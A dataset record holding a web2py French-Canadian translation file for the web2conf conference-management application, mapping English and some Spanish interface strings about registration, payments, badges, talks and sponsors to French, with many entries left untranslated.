repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
reingart/web2conf_googlecode | refs/heads/master | languages/fr-ca.py | 4 | # coding: utf8
{
'\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n': '\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n',
'\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n--\n%s\n': '\nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n--\n%s\n',
' \nDear Attendee,\n\nTo complete your registratio to the event, click on the following link:\n\n%s\n\n%s\n': ' \nDear Attendee,\n\nTo complete your registratio to the event, click on the following link:\n\n%s\n\n%s\n',
' \nDear Attendee,\n\nTo complete your registratio, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo complete your registratio, click on the following link:\n\n%s\n\n--\n%s\n',
' \nDear Attendee,\n\nTo complete your registration, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo complete your registration, click on the following link:\n\n%s\n\n--\n%s\n',
' \nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n': ' \nDear Attendee,\n\nTo proceed with your registration and verify your email, click on the following link:\n\n%s\n\n--\n%s\n',
' %s:\n\n %s\n\n\n Please do not respond this automated message\n %s\n ': ' %s:\n\n %s\n\n\n Please do not respond this automated message\n %s\n ',
' Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.': ' Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.',
'!langcode!': 'fr-ca',
'!langname!': 'fr-ca',
'# Reviews': '# Reviews',
'%(days)s days, %(hours)s hours, %(minutes)s minutes': '%(days)s days, %(hours)s hours, %(minutes)s minutes',
'%0.2f': '%0.2f',
'%5d Completed Registrations': '%5d Completed Registrations',
'%5d Pending Registrations': '%5d Pending Registrations',
'%5d Total Paid and Pending Registrations': '%5d Total Paid and Pending Registrations',
'%s days left': '%s days left',
'%s people have registered for PyCon 2009': '%s personnes se sont inscrites pour PyCon 2009',
'%s Recent Tweets': '%s Recent Tweets',
'%s Registration Confirmation': '%s Registration Confirmation',
'%s Registration Password': '%s Registration Password',
'%s registrations so far': '%s registrations so far',
'%s rows deleted': '%s rows deleted',
'%s rows updated': '%s rows updated',
'%s submission closed on %s': '%s submission closed on %s',
'%s to %s': '%s to %s',
'%s:\n%s\n\nPlease do not respond this automated message\n%s': '%s:\n%s\n\nPlease do not respond this automated message\n%s',
'%Y-%m-%d': '%d-%m-%Y',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(': '(',
'(%s)': '(%s)',
'(address required for PSF donation receipt; also see %s)': '(une adresse de correspondance est nécessaire pour recevoir un reçu de don au PSF. Voyez aussi %s) :',
'(airports codes, bus stations, etc.)': '(airports codes, bus stations, etc.)',
'(also used for attendee mapping)': '(aussi utilisé pour situer les personnes présentes)',
'(cellphone)': '(cellphone)',
'(cost TBD)': '(cost TBD)',
'(datallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM)': '(datallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM)',
'(dates, airports codes, bus stations, etc.)': '(dates, airports codes, bus stations, etc.)',
'(discounts)': '(discounts)',
'(explain why)': '(explain why)',
'(for map)': '(for map)',
'(i.e. position)': '(i.e. position)',
'(ie. interests)': '(ie. interests)',
'(If paying for others but not attending yourself, register yourself as "Not Attending")': "(Si vous payez pour d'autres personnes, mais vous ne venez pas vous même, inscrivez-vous avec <<N'assiste pas>>) :",
'(if popups are blocked)': '(if popups are blocked)',
'(if you subscribte to the link, your calendar application will be automatically updated)': '(if you subscribte to the link, your calendar application will be automatically updated)',
'(in ARS pesos)': '(in ARS pesos)',
'(limited seats)': '(limited seats)',
'(logo for badge)': '(logo for badge)',
'(new filename for downloads)': '(new filename for downloads)',
'(only for registered users)': '(only for registered users)',
'(optional)': '(optional)',
'(required for speakers)': '(required for speakers)',
'(required if you need a certificate)': '(required if you need a certificate)',
'(required)': '(requis)',
'(required, for badge)': '(nécessaire pour porte nom)',
'(see %s)': '(voyez %s)',
'(selecciona la distribución a instalar)': '(selecciona la distribución a instalar)',
'(seleccione su preferencia de charlas para estimar cupo de asistentes; ': '(seleccione su preferencia de charlas para estimar cupo de asistentes; ',
'(seleccione su preferencia de charlas para la organización del evento; ': '(seleccione su preferencia de charlas para la organización del evento; ',
'(subscribte to that link to get updates in your calendar application automatically)': '(subscribte to that link to get updates in your calendar application automatically)',
', la disponibilidad y horarios pueden variar sin previo aviso)': ', la disponibilidad y horarios pueden variar sin previo aviso)',
'1 Day': '1 jour',
'2 Days': '2 jours',
'3 Days': '3 jours',
'4 Days': '4 jours',
'; first tutorial costs $120, additional tutorials cost $80)': ', la première leçon coûte 120 $, chaque leçon additionel coûte 80 $) :',
'<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: %s)</font>': '<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: %s)</font>',
'<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: 23 February 2009)</font>': '<b><font color="red">Applications are no longer being accepted.</b><br>(Financial Aid Application deadline: 23 February 2009)</font>',
'@%s Recent Tweets': '@%s Recent Tweets',
'A money order in USD and depositable in a US bank is also acceptable.': 'Un mandat-carte, payable en dollars américains et qui peut être dépôsé dans une banque américaine, est également acceptable.',
'A new window will open with the sample badge in PDF': 'A new window will open with the sample badge in PDF',
'A review of your activity %(activity)s has been created or updated by %(user)s.': 'A review of your activity %(activity)s has been created or updated by %(user)s.',
'About': 'À prepos',
'About PyConAr Sponsors': 'About PyConAr Sponsors',
'About the software of this site': 'About the software of this site',
'About this software': 'À prepos de ce logiciel',
'Abstract': 'Abstract',
'Accepted Activities': 'Accepted Activities',
'Accepted Talks': 'Présentations acceptés',
'Access for site managers': 'Access for site managers',
'Accomodation': 'Accomodation',
'Activities': 'Activities',
'ACTIVITY': 'ACTIVITY',
'Activity': 'Activity',
'Activity %(activity)s review': 'Activity %(activity)s review',
'Activity %s Confirmed. Thank you!': 'Activity %s Confirmed. Thank you!',
'Activity Info': 'Activity Info',
'Activity Proposal': 'Activity Proposal',
'Add a comment on this Activity': 'Add a comment on this Activity',
'Add a comment on this Talk': 'Add a comment on this Talk',
'Add Author': 'Add Author',
'add author': 'add author',
'Add/remove tutorials': 'Ajouter/enlever des leçons',
'Added to Reviewer Group!': 'Added to Reviewer Group!',
'Additional Donation': 'Additional Donation',
'Additional remarks': 'Additional remarks',
'Advanced': 'Advanced',
'After completing this form you will receive a verification message by email. Follow the link therein, login with the email/password you chose below and you will be redirected to a payment form. You will be able to pay by credit card using Google Checkout. Register as non-attending in order to register and pay for other people.': "Après avoir rempli ce formulaire, vous allez recevoir un message de confirmation par courriel. Ce courriel va contenir un lien. Suivez le lien et ouvrez une session en utilisant l'addresse de couriel et le mot de passe que vous allez choisir ci-dessous. Vous serez redirigé vers un formulaire de paiement. Vous devrez utiliser Google Checkout pour payer par carte de crédit. Si nécessaire, inscrivez-vous avec <<Je n'assiste pas>> si vous voulez seulement enregistrer et payer pour d'autres personnes. :",
'All registered attendees will receive free of charge:': 'All registered attendees will receive free of charge:',
'Already in the Reviewer Group!': 'Already in the Reviewer Group!',
'alta calidad /medium': 'alta calidad /medium',
'alta calidad/large': 'alta calidad/large',
'alta calidad/small': 'alta calidad/small',
'alta calidad/xlarge': 'alta calidad/xlarge',
'alta calidad/xxlarge': 'alta calidad/xxlarge',
'alta calidad/xxxlarge': 'alta calidad/xxxlarge',
'Amount': 'Amount',
'Amount paid by you': 'Montant payé par vous',
'Amount paid for you by somebody else': "Montant payé pour vous par quelqu'un d'autre",
'An error occured, please %s the page': 'An error occured, please %s the page',
'and mail it to:': "et l'envoyer à:",
'Are you human?': 'Êtes-vous humain?',
'Are you sure you want to delete this object?': 'Are you sure you want to delete this object?',
'Articles': 'Articles',
'attach': 'attach',
'Attach': 'Attacher',
'Attach a file to this Activity': 'Attach a file to this Activity',
'Attach a file to this Talk': 'Attach a file to this Talk',
'Attachments': 'Fichiers joints',
'Attendee Locations': 'Localisations des personnes présentes',
'Attendee Mail-List': 'Attendee Mail-List',
'Attendee registered and balance transferred': 'Personne présente enregistré et solde de compte transféré :',
'Attendees': 'Personnes présentes',
'Attending InstallFest': 'Attending InstallFest',
'Attending Sprints': "Sprints d'assistances",
'Author': 'Author',
'author': 'author',
'Authors': 'Authors',
'Average': 'Average',
'Back to inbox': 'Back to inbox',
'Back to the events list': 'Back to the events list',
'Back to the options list': 'Back to the options list',
'Back to the project list': 'Back to the project list',
'Back to the projects list': 'Back to the projects list',
'Badge': 'Badge',
'Badge Line 1': 'File 1 pour portes-noms',
'Badge Line 2': 'File 2 pour portes-noms',
'Badge Name': 'Nom sur porte-nom',
'badge, certificate, program guide, community magazine': 'badge, certificate, program guide, community magazine',
'badge, certificate, program guide, community magazine and special benefits': 'badge, certificate, program guide, community magazine and special benefits',
'Badges': 'Portes-noms',
'baja calidad /medium': 'baja calidad /medium',
'baja calidad/large': 'baja calidad/large',
'baja calidad/small': 'baja calidad/small',
'baja calidad/xlarge': 'baja calidad/xlarge',
'baja calidad/xxlarge': 'baja calidad/xxlarge',
'baja calidad/xxxlarge': 'baja calidad/xxxlarge',
'Balance transferred': 'Solde de compte transféré',
'Bank account transfer': 'Bank account transfer',
'Beginner': 'Beginner',
'Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.': 'Below is a complete list of companies representede at the conference. Some companies do not wish to make their attendance publie. This list is accessible by managers only.',
'Below is a partial list of companies represented at the conference, who wished to make their attendance public. The list is sorted by company name.': 'Ci-dessous est une liste partielle des entreprises représentées à la conférence. La liste comprend seulement les entreprises qui voulaient que leurs noms paraîssent dans la liste. La liste est triée par le nom de la société.',
"Below is a partial list of conference attendees, showing everyone who wished to make their attendance public. The list is sorted by the attendee's name.": 'Ci-dessous est une liste partielle des personnes présentes à la conférence. La liste comprend seulement les personnes qui voulaient que leurs noms soient publiés. La liste est triée par le nom de la personne présente.',
'Below is the complete list, as accessible to managers only.': 'Ci-dessous est la liste complète, ce qui est seulement accessible par les gestionnaires.',
'Blog': 'Blog',
'Blog href': 'Blog href',
'Body': 'Body',
'Bookmark the activities you want to attend': 'Bookmark the activities you want to attend',
'boolean': 'boolean',
'Booths': 'Booths',
'break': 'break',
'Breakdown by person': 'Répartition par personne',
'Brief': 'Brief',
'Built using': 'Built using',
'by': 'by',
'Cancel': 'Cancel',
'cancel': 'annuler',
'Cancelled': 'Cancelled',
'Cash (or third party cash services': 'Cash (or third party cash services',
'Cash (Oxxo or 7Eleven)': 'Cash (Oxxo or 7Eleven)',
'Categories': 'Categories',
'cc': 'cc',
'Certificate': 'Certificate',
'Certificate cost is $5.-': 'Certificate cost is $5.-',
'Certificates': 'Certificates',
'Charts': 'Tableaux',
'City': 'Ville',
'City Tour': 'City Tour',
'click here': 'click here',
'close': 'close',
'comment': 'comment',
'Comments': 'Commentaires',
'Community Booths': 'Community Booths',
'Companies': 'Entreprises',
'Companies represented': 'Entreprises représentées',
'Company': 'Company',
'Company Home Page': "Page d'accueil de l'entreprise",
'Company Name': "Nom de l'entreprise",
'company, university': 'company, university',
'Complete the Sponsor form': 'Complete the Sponsor form',
'Conference': 'Conférence',
'Conference description<b>dates</b> city (organized by <a href="#">users group</a>). <br/>\nMore info: <a href="#">blog</a> Contact: <a href="#">mail address</a>': 'Conference description<b>dates</b> city (organized by <a href="#">users group</a>). <br/>\nMore info: <a href="#">blog</a> Contact: <a href="#">mail address</a>',
'Conference events': 'Conference events',
'Conference Participants': 'Participant(e)s de la conférence',
'Confirm': 'Confirm',
'confirm': 'confirm',
'Confirm attendance': 'Confirm attendance',
'Confirm my assistance': 'Confirm my assistance',
'confirmed': 'confirmed',
'Confirmed!': 'Confirmed!',
'Contact': 'Contact',
'Contacto con Auspiciantes': 'Contacto con Auspiciantes',
'Corporate/Government (early), $450': "Société ou entreprise d'État (tôt), 450 $",
'Corporate/Government (on site), $650': "Société ou entreprise d'État (sur le site), 650 $",
'Corporate/Government (regular), $550': "Société ou entreprise d'État (régulier), 550 $",
'corporation, university, user group, etc.': 'corporation, university, user group, etc.',
'Correct': 'Correct',
'cost TBD': 'cost TBD',
'Could not send the tweet': 'Could not send the tweet',
'Country': 'Country',
'Coupon code': 'Coupon code',
'Coupon does not exist!': 'Coupon does not exist!',
'Coupon is already used!': 'Coupon is already used!',
'Create a new account using social networks single sign-on': 'Create a new account using social networks single sign-on',
'Create a non-attending registration for yourself first!': 'Create a non-attending registration for yourself first!',
'Create a traditional account using email/password': 'Create a traditional account using email/password',
'Create or update your<br><b>payment</b>': 'Create or update your<br><b>payment</b>',
'Created By': 'Created By',
'Created On': 'Created On',
'Created Signature': 'Created Signature',
'Credit card': 'Credit card',
'Credited': 'Credited',
'Credited payments': 'Credited payments',
'CRUD': 'CRUD',
'CSV for Badges': 'Fichier CSV pour les portes-noms',
'Current posted events': 'Current posted events',
'CV': 'CV',
'data uploaded': 'données téléversées',
'date': 'date',
'Date': 'Date',
'Date and time of submission': 'Date and time of submission',
'datetime': 'datetime',
'db': 'base de données',
'Deadline to join reviewers group was %s': 'Deadline to join reviewers group was %s',
'Dear attendee': 'Dear attendee',
'describe why you want to come to PyCon': 'describe why you want to come to PyCon',
'Description': 'Description',
'design': 'design',
'Desmarcar si no desea que los Auspiciantes de la conferencia tengan acceso a sus datos de contacto': 'Desmarcar si no desea que los Auspiciantes de la conferencia tengan acceso a sus datos de contacto',
'Detallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM': 'Detallar un inventario del equipo, a efectos del ingreso al recinto y facilitar la instalación. Incluir: Placa de red, video, sonido, módem (marcas, modelos, configuración); CPU (Procesador); Memoria RAM',
'DineroMail': 'DineroMail',
'DineroMail funds': 'DineroMail funds',
'Discount Coupon': 'Coupon de réduction',
'Distinguished speakers': 'Distinguished speakers',
'Donation to PSF': 'Faire un don au PSF',
'Donation to PyAr': 'Donation to PyAr',
'Done!': 'Done!',
'done!': 'fini!',
'double': 'double',
'Download your bookmarks': 'Download your bookmarks',
'Duration': 'Duration',
'Duration in minutes': 'Duration in minutes',
'Each time you submit or update your application, it is emailed to you and the Financial Aid Administrator.': 'Each time you submit or update your application, it is emailed to you and the Financial Aid Administrator.',
'edit': 'edit',
'Edit': 'Edit',
'Edit event': 'Edit event',
'Edit option': 'Edit option',
'Edit your Badge': 'Edit your Badge',
'Edit Your Financial Aid Application': "Modifier votre demande d'aide financière",
'Edit your profile and preferences': 'Modifier votre profil et vos préférences',
'El Costo de Certificado es $x.-': 'El Costo de Certificado es $x.-',
'email': 'email',
'Email': 'Email',
'Email verified': 'Courriel vérifié',
'End time': 'End time',
'Entity Home Page': 'Entity Home Page',
'Entity Name': 'Entity Name',
'Error parsing request data %s': 'Error parsing request data %s',
'Event': 'Event',
'Event Proposal': 'Event Proposal',
'Events': 'Events',
'Expenses': 'Expenses',
'Explore': 'Explore',
'Expo Hall': 'Expo Hall',
'Extreme': 'Extreme',
'extreme talk': 'extreme talk',
'extreme_talk': 'extreme_talk',
'FA-(email all)': 'FA-(envoyez courriel à tous)',
'FA-CSV': 'FA-CSV',
'Family Name': 'Nom de famille',
'Fees': 'Frais',
'File': 'File',
'Financial Aid': 'Financial Aid',
'Financial Aid Online Application': "Demande d'aide financière en ligne",
'Financial Analysis': 'Analyse financière',
'Financials': 'Finances',
'First Name': 'First Name',
'Following is a copy of the submitted data': 'Following is a copy of the submitted data',
'Food Preference': 'Préférences alimentaires',
'For more information, please see': 'For more information, please see',
'Format': 'Format',
'From': 'Adresse émettrice',
'from %s': 'from %s',
'Full Google Calendar': 'Full Google Calendar',
'full schedule (customizable!)': 'full schedule (customizable!)',
'full schedule (reserve your seat!)': 'full schedule (reserve your seat!)',
'general': 'general',
'General Information': 'General Information',
'Given Name': 'Prénom',
'Google Checkout accepts Visa, MasterCard, American Express and Discover. For more information, see ': "Google Checkout accepte Visa, MasterCard, American Express et Discover. Pour plus d'information, voire :",
'Google Checkout Buyer Help.': "Aide d'achat pour Google Checkout.",
'Gratuito, $0': 'Gratuito, $0',
'halal': 'halale',
'Hello': 'Bonjour',
'Help': 'Help',
'Here is a partial list of conference attendees, showing everyone who wished to make their attendance public.': 'Here is a partial list of conference attendees, showing everyone who wished to make their attendance public.',
'History': 'History',
'Hobbyist (early), $250': 'Amateur (tôt), 250 $',
'Hobbyist (on site), $450': 'Amateur (sur le site), 450 $',
'Hobbyist (regular), $350': 'Amateur (régulier), 350 $',
'Home': 'Home',
'Hotel where Staying': 'Hôtel où vous restez',
"How to Pay somebody else's fees": "Comment payer les frais de quelqu'un d'autre",
'How to Register somebody else and pay their fees': 'Comment inscrire une autre personne et payer leurs frais :',
'I need a time extension': 'I need a time extension',
'I want a certificate of attendance': 'I want a certificate of attendance',
"I'm interested (joining is optional)": "I'm interested (joining is optional)",
'ID': 'ID',
'Id': 'Id',
'If checked, your Name, Company and Location will be displayed publicly': 'If checked, your Name, Company and Location will be displayed publicly',
'If you have pedning payments (SUBMITTED status) reload this page to change for status change. Your due amount will be updated when the payment is CHARGED.': 'Si vous avez des paiements en attente (statut SOUMIS) veuillez recharger cette page pour voire les changements. Votre solde de compte sera mis à jour lorsque le paiement est porté à votre compte. :',
'If you have pending payments (new status), reload this page to check for status updates. ': 'If you have pending payments (new status), reload this page to check for status updates. ',
'If you have pending payments (SUBMITTED status), reload this page to check for status updates. The amount due will be updated when the payment is CHARGED.': 'Si vous avez des paiements en attente (statut SOUMIS) veuillez recharger cette page pour voire les changements. Votre solde de compte sera mis à jour lorsque le paiement est porté à votre compte. :',
'If you intend to apply, please use the ': "Si vous avez l'intention d'appliquer, s'il vous plaît utiliser le",
'If you want you can upload your CV to be available to our Sponsors in further laboral searchs:': 'If you want you can upload your CV to be available to our Sponsors in further laboral searchs:',
'If you wish to pay by check, please send a check drawn on a US bank for US$%0.2f payable to:': "Si vous souhaitez payer par chèque, s'il vous plaît envoyez-nous un chèque de 0.2f% $ USD tiré sur une banque américaine, payable à :",
'In order to apply for financial aid, we need a bit of information from you, in the form below.': 'In order to apply for financial aid, we need a bit of information from you, in the form below.',
'Inbox': 'Inbox',
'Include in Delegates List': 'Inclure dans la liste des représentants',
'Index': 'Index',
'info': 'info',
'Insert New': 'Insérer nouveau',
'Insert new': 'Insert new',
'InstallFest Hardware': 'InstallFest Hardware',
'InstallFest Operating System': 'InstallFest Operating System',
'integer': 'integer',
'Intermediate': 'Intermediate',
'Invalid account number': 'Invalid account number',
'Invalid account or password': 'Invalid account or password',
'Invalid operation': 'Opération invalide',
'Invalid password': 'Invalid password',
'Invalid Query': 'Invalid Query',
'Invalid query type': 'Invalid query type',
'invalid request': 'demande invalide',
'invalid SQL FILTER': 'filtre SQL invalide',
'invalid SQL FILTER or UPDATE STRING': 'filtre ou chaîne de mise à jour SQL invalide',
'Invalid URL': 'Adresse URL invalide',
'invalid!': 'invalide!',
'Invoice': 'Invoice',
'Ivalid operation ID': 'Ivalid operation ID',
'Job Fair': 'Job Fair',
'Jobs': 'Jobs',
'Join': 'Join',
'keynote': 'keynote',
'Keynote': 'Keynote',
'Keynotes': 'Keynotes',
'kosher': 'cacher',
'Language': 'Language',
'large': 'large',
'last modification: %s': 'last modification: %s',
'Last Name': 'Last Name',
'Learn how to<br>become a <b>sponsor</b>': 'Learn how to<br>become a <b>sponsor</b>',
'Learn how to<br>submit a <b>project</b>': 'Learn how to<br>submit a <b>project</b>',
'Legend:': 'Legend:',
'Level': 'Level',
'License': 'License',
'lightning talk': 'lightning talk',
'Lightning Talks': 'Lightning Talks',
'link': 'link',
'List of generated payments': 'List of generated payments',
'List of mismatching activity names voted': 'List of mismatching activity names voted',
'List of submitted payments': 'Liste des paiements soumis',
'loading...': 'loading...',
'Location': 'Location',
'log in using social network profile': 'log in using social network profile',
'log in using username and password': 'log in using username and password',
'Login': 'Ouvrir une session',
'login using username and password': 'login using username and password',
'Logout': 'Fermer une session',
'lost your password?': 'lost your password?',
'Mailing Address': 'Mailing Address',
'Mailing Address Line 1': 'Adresse de correspondance, ligne 1',
'Mailing Address Line 2': 'Adresse de correspondance, ligne 2',
'Main': 'Main',
'Malformed': 'Malformed',
'Manage': 'Gérer',
'Many categories (needs filters)': 'Many categories (needs filters)',
'Maps': 'Cartes',
'Marked in schedule on %s': 'Marked in schedule on %s',
'medium': 'medium',
"men's/2xlarge": 'pour homme/xx-large',
"men's/3xlarge": 'pour homme/xxx-large',
"men's/large": 'pour homme/large',
"men's/medium": 'pour homme/moyen',
"men's/small": 'pour homme/petit',
"men's/xlarge": 'pour homme/x-large',
'Message': 'Message',
'Message: %(noops)s. Error: %(error)s': 'Message: %(noops)s. Error: %(error)s',
'min': 'min',
'Mind that a submitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "S'il vous plaît soyez conscient que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été refusé. Vous pouvez trouver l'état de vos paiements ci-dessous. :",
'Mind that a sumitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "S'il vous plaît soyez conscient que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été refusé. Vous pouvez trouver l'état de vos paiements ci-dessous. :",
'Modified By': 'Modified By',
'Modified On': 'Modified On',
'Money Transfers': "Transferts d'argent",
'more': 'more',
'More Information': 'More Information',
'name': 'name',
'Name': 'Name',
'Nearest events': 'Nearest events',
'need to register?': 'need to register?',
'New activity proposal %(activity)s': 'New activity proposal %(activity)s',
'new record inserted': 'nouveau dossier inséré',
'No': 'Non',
'No message found': 'No message found',
'No operations found': 'No operations found',
'No operations updated': 'No operations updated',
'No payment due at this time': 'Aucun paiement exigé en ce moment',
'No payment records found for code %s': 'No payment records found for code %s',
'No payment records found for codes %s (%s)': 'No payment records found for codes %s (%s)',
'No payments!': 'No payments!',
'no records': 'aucuns dossiers',
'no, thanks': 'no, thanks',
'Nobody registered for tutorials': "Personne c'est enregistré pour les leçons",
'noname': 'noname',
'normal': 'normal',
'Not Attending, $0': "N'assiste pas, 0$",
'Not authorized to view a event if not own!': 'Not authorized to view a event if not own!',
'Not Autorized!': 'Not Autorized!',
'Not Confirmed, please enter into your profile and check %s field': 'Not Confirmed, please enter into your profile and check %s field',
"Not Confirmed, please enter into your profile and check '%s' field": "Not Confirmed, please enter into your profile and check '%s' field",
'Not implemented': 'Not implemented',
'Notes': 'Notes',
'Number': 'Number',
'Nª': 'Nª',
'only used for sprints)': 'only used for sprints)',
'open space': 'open space',
'Open Space': 'Open Space',
'Open Spaces': 'Open Spaces',
'open-space': 'open-space',
'Operation number': 'Operation number',
'Option changed': 'Option changed',
'Order': 'Order',
'Organizer': 'Organizer',
'Other people conference fees': "Les frais de conférence d'autres personnes",
"Other people's conference fees": "Les frais de conférence d'autres personnes",
'our estimate of attendance reaches the room size, last remaining seats!': 'our estimate of attendance reaches the room size, last remaining seats!',
'Page format converted!': 'Page format converted!',
'Page History': 'Page History',
'Page Not Found': 'Page Not Found',
'Page Not Found!': 'Page Not Found!',
'Page Preview': 'Page Preview',
'Page saved': 'Page saved',
'panel': 'panel',
'paper': 'paper',
'Partakers of %s': 'Partakers of %s',
'password': 'password',
'Password': 'Password',
'Pay': 'Pay',
'Pay by check': 'Payer par chèque',
'Pay for somebody else': "Payer pour quelqu'un d'autre",
'pay now': 'payez maintenant',
'Payment cancelled': 'Paiement annulé',
'Payment expected': 'Paiement exigé',
'Payments': 'Paiements',
'Payments query result': 'Payments query result',
'Pending': 'Pending',
'Personal Home Page': "Page d'accueil personnel",
'Pesos/Reales': 'Pesos/Reales',
'Phone Number': 'Numéro de téléphone',
'Photo': 'Photo',
'Planet News': 'Planet News',
'Please enter your e-mail address; a new password will be sent to you.': "S'il vous plaît entrer votre adresse courriel, un nouveau mot de passe vous sera envoyé.",
'Please note that a submitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "S'il vous plaît soyez conscient que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été refusé. Vous pouvez trouver l'état de vos paiements ci-dessous. :",
'Please note that a sumitted payment may take time to be processed. It may take up to one hour to process a payment. Do not pay twice unless your payment is explicitly declined. You can find the status of your payments below.': "S'il vous plaît soyez conscient que ça peut prendre jusqu'à une heure pour qu'un paiement soit traité. Ne payez pas deux fois à moins que votre paiement ait été refusé. Vous pouvez trouver l'état de vos paiements ci-dessous. :",
'Please read these instructions BEFORE submitting your application.': 'Please read these instructions BEFORE submitting your application.',
'Please remember to fill the note field if you need more time.': 'Please remember to fill the note field if you need more time.',
'Please see': 'Please see',
'plenary': 'plenary',
'Posted': 'Posted',
'poster': 'poster',
'Powered by': 'Powered by',
'Powered by web2py': 'Powered by web2py',
'Presenter': 'Presenter',
'Press Release': 'Press Release',
'Preview': 'Preview',
'Privacy policy': 'Privacy policy',
'Profile': 'Profil',
'project': 'project',
'Projects': 'Projects',
'Proposal': 'Proposal',
'Proposals': 'Proposals',
'Propose talk': 'Propose talk',
'Proposed Activities': 'Proposed Activities',
'Proposed Talks': 'Présentations proposées',
'Prospectus': 'Prospectus',
'Publicize': 'Publicize',
'PyConAr Blog': 'PyConAr Blog',
'PyConAr Sprint Projects': 'PyConAr Sprint Projects',
'Python knowledge level': 'Python knowledge level',
'Ranking': 'Ranking',
'Rating': 'Rating',
'Rating %(rating)s from user %(created_signature)s on %(created_on)s, says: %(body)s': 'Rating %(rating)s from user %(created_signature)s on %(created_on)s, says: %(body)s',
'Rating %(rating)s: %(body)s': 'Rating %(rating)s: %(body)s',
'Rating Average': 'Rating Average',
'Rating SUM)': 'Rating SUM)',
'Ratings': 'Ratings',
'Ratings Summary': 'Ratings Summary',
"Really...? I'd like to dismiss it.": "Really...? I'd like to dismiss it.",
'record does not exist': "le dossier n'existe pas",
'records deleted': 'dossiers supprimés',
'records updated': 'dossiers mis à jour',
'reference': 'reference',
'Register': 'Enregistrer',
'Register ': 'Register ',
'Register and pay for somebody else': "Enregistrer et payer pour quelqu'un d'autre",
'Registering or paying for others?': 'Registering or paying for others?',
'Registration': 'Registration',
'Registration %s - Confirmation': 'Registration %s - Confirmation',
'Registration date': 'Registration date',
'Registration Form': "Formulaire d'inscription",
'Registration Type': "Sorte d'inscription",
'reload': 'reload',
'remember my twitter password': 'remember my twitter password',
'Request payment update': 'Request payment update',
'Reset Password': 'Réinitialiser le mot de passe',
'Restaurants': 'Restaurants',
'Resume (Bio)': 'Resume (Bio)',
'Resume (CV)': 'Resume (CV)',
'Retrieve Username': 'Retrieve Username',
'review': 'review',
'Review Ratings': 'Review Ratings',
'Review this Activity': 'Review this Activity',
'Review this Event': 'Review this Event',
'Review this Talk': 'Écrire une critique à propos de cette présentation',
'review:': 'review:',
'reviewers': 'reviewers',
'Reviews': 'Critiques',
'Room': 'Room',
'Room Sharing': 'Room Sharing',
'RSS': 'RSS',
'RSS/Atom feed': 'RSS/Atom feed',
'Sample Badge Preview': 'Sample Badge Preview',
'Save': 'Save',
'Schedule': 'Schedule',
'Scheduled Activities': 'Scheduled Activities',
'Scheduled Datetime': 'Scheduled Datetime',
'Scheduled Room': 'Scheduled Room',
'Science': 'Science',
'Science Track': 'Science Track',
'Scientific Track': 'Scientific Track',
'Score': 'Score',
'Search': 'Recherche',
'Search payments by user name': 'Search payments by user name',
'See the partakers list': 'See the partakers list',
'See your<br>badge <b>preview</b>': 'See your<br>badge <b>preview</b>',
'Seleccionar la distribución que desea instalar': 'Seleccionar la distribución que desea instalar',
'Settings': 'Settings',
'Short Biografy and reference (required for speakers)': 'Short Biografy and reference (required for speakers)',
'Short Biography and references (for authors)': 'Short Biography and references (for authors)',
'sign up!': 'sign up!',
'Sign-up': 'Sign-up',
'small': 'small',
'social': 'social',
'Social networks single sign-on': 'Social networks single sign-on',
'Somebody else will pay for me': "Quelqu'un d'autre va payer pour moi",
'Speaker': 'Speaker',
'Speakers': 'Speakers',
'Sponsor': 'Sponsor',
'Sponsor form has errors!': 'Sponsor form has errors!',
'Sponsor Sign Up form': 'Sponsor Sign Up form',
'Sponsor sign-up form successfully processed': 'Sponsor sign-up form successfully processed',
'Sponsors': 'Sponsors',
'Sprint': 'Sprint',
'sprint': 'sprint',
'Sprint Projects': 'Sprint Projects',
'Sprints': 'Sprints',
'Staff': 'Staff',
'stand': 'stand',
'Start time': 'Start time',
'Starts in': 'Starts in',
'startup': 'startup',
'State': 'État',
'state': 'état',
'Stats': 'Statistiques',
'Status': 'Status',
'Status: %s': 'Status: %s',
'string': 'string',
'Student (early), $150': 'Étudiant(e) (tôt), 150 $',
'Student (on site), $250': 'Étudiant(e) (sur le site), 250 $',
'Student (regular), $200': 'Étudiant(e) (régulier), 200 $',
'Student works contest': 'Student works contest',
'Students': 'Students',
'Subject': 'Subject',
'Submit a Activity Proposal': 'Submit a Activity Proposal',
